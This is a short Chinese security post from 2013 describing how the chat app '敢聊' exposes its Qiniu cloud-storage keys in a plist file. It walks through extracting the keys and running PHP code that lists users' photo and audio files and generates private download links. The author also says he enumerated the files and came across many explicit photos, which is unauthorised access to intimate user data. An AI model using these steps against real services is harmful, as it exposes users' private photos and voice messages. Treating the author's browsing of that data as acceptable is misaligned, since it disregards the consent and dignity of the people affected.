“敢聊”用户照片及语音等隐私泄露
- 来源:2cto.com 原创,转载,摘录,分享
- 时间:2013-10-25
- 阅读: 次
- 本文标签:隐私泄露
在APP的配置文件中保存了云存储(使用的是七牛)的APPKEY、APPSECRET和空间名称、空间域名,显然,有了这些东西,那么用户发送的所有资料,都一览无余。
第一、用ITOOLS等工具打开应用。
第二,打开com.ruoogle.gamechat.plist该文件,无法直视啊。。
空间地址:GC_Static = "http://staticnova.ruoogle.com/";
第三、去七牛官网下载SDK,配置好。
PHP:
//照片列表 $rst = Qiniu_RSF_ListPrefix($client, $bucket,'photo/1','',1000); var_dump($rst); //音频列表 $rst = Qiniu_RSF_ListPrefix($client, $bucket,'audio','',1000); var_dump($rst);
第四、运行
第五、测试,获取文件下载地址
PHP:
$key = isset($_GET['i']) ? $_GET['i'] : 'photo/10022/xxxxxx.jpg'; Qiniu_SetKeys($accessKey, $secretKey); $baseUrl = Qiniu_RS_MakeBaseUrl($domain, $key); $getPolicy = new Qiniu_RS_GetPolicy(); $privateUrl = $getPolicy->MakeRequest($baseUrl, null); echo '<img src="'. $privateUrl .'" />' . "\n";
语音文件同理
PS. 遍历下载发现不少鲍照啊。。。。
相关文章
本文链接:http://www.it892.com/content/security/hacker/20131025/4972.html